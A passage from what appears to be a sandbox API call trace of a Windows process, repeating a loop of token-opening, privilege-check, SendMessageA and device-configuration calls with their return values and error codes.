pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.074] SetLastError (dwErrCode=0x522) [0085.074] CloseHandle (hObject=0x114) returned 1 [0085.074] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.074] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.074] GetLastError () returned 0x578 [0085.074] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.074] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.074] GetCurrentThread () returned 0xfffffffe [0085.074] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.074] GetLastError () returned 0x3f0 [0085.074] GetCurrentProcess () returned 0xffffffff [0085.074] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.075] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.075] SetLastError (dwErrCode=0x522) [0085.075] CloseHandle (hObject=0x114) returned 1 [0085.075] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.075] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.075] GetLastError () returned 0x578 [0085.075] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.075] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.075] GetCurrentThread () returned 0xfffffffe [0085.075] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.075] GetLastError () returned 0x3f0 [0085.075] GetCurrentProcess () returned 0xffffffff [0085.075] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.075] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.075] SetLastError (dwErrCode=0x522) [0085.075] CloseHandle (hObject=0x114) returned 1 [0085.075] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.075] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.075] GetLastError () returned 0x578 [0085.075] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.075] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.075] GetCurrentThread () returned 0xfffffffe [0085.075] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.075] GetLastError () returned 0x3f0 [0085.075] GetCurrentProcess () returned 0xffffffff [0085.075] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.075] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.075] SetLastError (dwErrCode=0x522) [0085.075] CloseHandle (hObject=0x114) returned 1 [0085.075] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.075] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.075] GetLastError () returned 0x578 [0085.075] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.075] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.075] GetCurrentThread () returned 0xfffffffe [0085.075] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.076] GetLastError () returned 0x3f0 [0085.076] GetCurrentProcess () returned 0xffffffff [0085.076] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.076] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.076] SetLastError (dwErrCode=0x522) [0085.076] CloseHandle (hObject=0x114) returned 1 [0085.076] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.076] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.076] GetLastError () returned 0x578 [0085.076] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.076] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.076] GetCurrentThread () returned 0xfffffffe [0085.076] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.076] GetLastError () returned 0x3f0 [0085.076] GetCurrentProcess () returned 0xffffffff [0085.076] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.076] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.076] SetLastError (dwErrCode=0x522) [0085.076] CloseHandle (hObject=0x114) returned 1 [0085.076] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.076] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.076] GetLastError () returned 0x578 [0085.076] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.076] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.076] GetCurrentThread () returned 0xfffffffe [0085.076] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.076] GetLastError () returned 0x3f0 [0085.076] GetCurrentProcess () returned 0xffffffff [0085.076] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.076] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.076] SetLastError (dwErrCode=0x522) [0085.076] CloseHandle (hObject=0x114) returned 1 [0085.076] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.076] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.076] GetLastError () returned 0x578 [0085.076] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.076] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.077] GetCurrentThread () returned 0xfffffffe [0085.077] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.077] GetLastError () returned 0x3f0 [0085.077] GetCurrentProcess () returned 0xffffffff [0085.077] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.077] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.077] SetLastError (dwErrCode=0x522) [0085.077] CloseHandle (hObject=0x114) returned 1 [0085.077] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.077] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.077] GetLastError () returned 0x578 [0085.077] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.077] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.077] GetCurrentThread () returned 0xfffffffe [0085.077] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.077] GetLastError () returned 0x3f0 [0085.077] GetCurrentProcess () returned 0xffffffff [0085.077] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.077] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.077] SetLastError (dwErrCode=0x522) [0085.077] CloseHandle (hObject=0x114) returned 1 [0085.077] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.077] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.077] GetLastError () returned 0x578 [0085.077] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.077] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.077] GetCurrentThread () returned 0xfffffffe [0085.077] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.077] GetLastError () returned 0x3f0 [0085.077] GetCurrentProcess () returned 0xffffffff [0085.077] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.077] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.077] SetLastError (dwErrCode=0x522) [0085.077] CloseHandle (hObject=0x114) returned 1 [0085.077] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.077] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.077] GetLastError () returned 0x578 [0085.078] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.078] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.078] GetCurrentThread () returned 0xfffffffe [0085.078] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.078] GetLastError () returned 0x3f0 [0085.078] GetCurrentProcess () returned 0xffffffff [0085.078] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.078] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.078] SetLastError (dwErrCode=0x522) [0085.078] CloseHandle (hObject=0x114) returned 1 [0085.078] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.078] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.078] GetLastError () returned 0x578 [0085.078] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.078] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.078] GetCurrentThread () returned 0xfffffffe [0085.078] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.078] GetLastError () returned 0x3f0 [0085.078] GetCurrentProcess () returned 0xffffffff [0085.078] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.078] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.078] SetLastError (dwErrCode=0x522) [0085.078] CloseHandle (hObject=0x114) returned 1 [0085.078] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.078] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.078] GetLastError () returned 0x578 [0085.078] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.078] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.078] GetCurrentThread () returned 0xfffffffe [0085.078] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.078] GetLastError () returned 0x3f0 [0085.078] GetCurrentProcess () returned 0xffffffff [0085.078] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.078] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.078] SetLastError (dwErrCode=0x522) [0085.078] CloseHandle (hObject=0x114) returned 1 [0085.079] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.079] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.079] GetLastError () returned 0x578 [0085.079] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.079] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.079] GetCurrentThread () returned 0xfffffffe [0085.079] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.079] GetLastError () returned 0x3f0 [0085.079] GetCurrentProcess () returned 0xffffffff [0085.079] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.079] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.079] SetLastError (dwErrCode=0x522) [0085.079] CloseHandle (hObject=0x114) returned 1 [0085.079] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.079] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.079] GetLastError () returned 0x578 [0085.079] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.079] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.079] GetCurrentThread () returned 0xfffffffe [0085.079] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.079] GetLastError () returned 0x3f0 [0085.079] GetCurrentProcess () returned 0xffffffff [0085.079] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.079] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.079] SetLastError (dwErrCode=0x522) [0085.079] CloseHandle (hObject=0x114) returned 1 [0085.079] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.079] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.079] GetLastError () returned 0x578 [0085.079] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.079] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.079] GetCurrentThread () returned 0xfffffffe [0085.079] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.079] GetLastError () returned 0x3f0 [0085.079] GetCurrentProcess () returned 0xffffffff [0085.079] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.080] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.080] SetLastError (dwErrCode=0x522) [0085.080] CloseHandle (hObject=0x114) returned 1 [0085.080] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.080] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.080] GetLastError () returned 0x578 [0085.080] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.080] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.080] GetCurrentThread () returned 0xfffffffe [0085.080] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.080] GetLastError () returned 0x3f0 [0085.080] GetCurrentProcess () returned 0xffffffff [0085.080] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.080] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.080] SetLastError (dwErrCode=0x522) [0085.080] CloseHandle (hObject=0x114) returned 1 [0085.080] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.080] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.080] GetLastError () returned 0x578 [0085.080] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.080] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.080] GetCurrentThread () returned 0xfffffffe [0085.080] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.080] GetLastError () returned 0x3f0 [0085.080] GetCurrentProcess () returned 0xffffffff [0085.080] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.080] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.080] SetLastError (dwErrCode=0x522) [0085.080] CloseHandle (hObject=0x114) returned 1 [0085.080] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.080] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.080] GetLastError () returned 0x578 [0085.080] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.080] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.080] GetCurrentThread () returned 0xfffffffe [0085.080] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.081] GetLastError () returned 0x3f0 [0085.081] GetCurrentProcess () returned 0xffffffff [0085.081] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.081] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.081] SetLastError (dwErrCode=0x522) [0085.081] CloseHandle (hObject=0x114) returned 1 [0085.081] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.081] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.081] GetLastError () returned 0x578 [0085.081] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.081] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.081] GetCurrentThread () returned 0xfffffffe [0085.081] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.081] GetLastError () returned 0x3f0 [0085.081] GetCurrentProcess () returned 0xffffffff [0085.081] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.081] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.081] SetLastError (dwErrCode=0x522) [0085.081] CloseHandle (hObject=0x114) returned 1 [0085.081] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.081] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.081] GetLastError () returned 0x578 [0085.081] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.081] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.081] GetCurrentThread () returned 0xfffffffe [0085.081] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.081] GetLastError () returned 0x3f0 [0085.081] GetCurrentProcess () returned 0xffffffff [0085.081] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.081] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.081] SetLastError (dwErrCode=0x522) [0085.081] CloseHandle (hObject=0x114) returned 1 [0085.081] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.081] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.081] GetLastError () returned 0x578 [0085.081] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.082] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.082] GetCurrentThread () returned 0xfffffffe [0085.082] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.082] GetLastError () returned 0x3f0 [0085.082] GetCurrentProcess () returned 0xffffffff [0085.082] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.082] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.082] SetLastError (dwErrCode=0x522) [0085.082] CloseHandle (hObject=0x114) returned 1 [0085.082] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.082] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.082] GetLastError () returned 0x578 [0085.082] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.082] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.082] GetCurrentThread () returned 0xfffffffe [0085.082] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.082] GetLastError () returned 0x3f0 [0085.082] GetCurrentProcess () returned 0xffffffff [0085.082] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.082] PrivilegeCheck 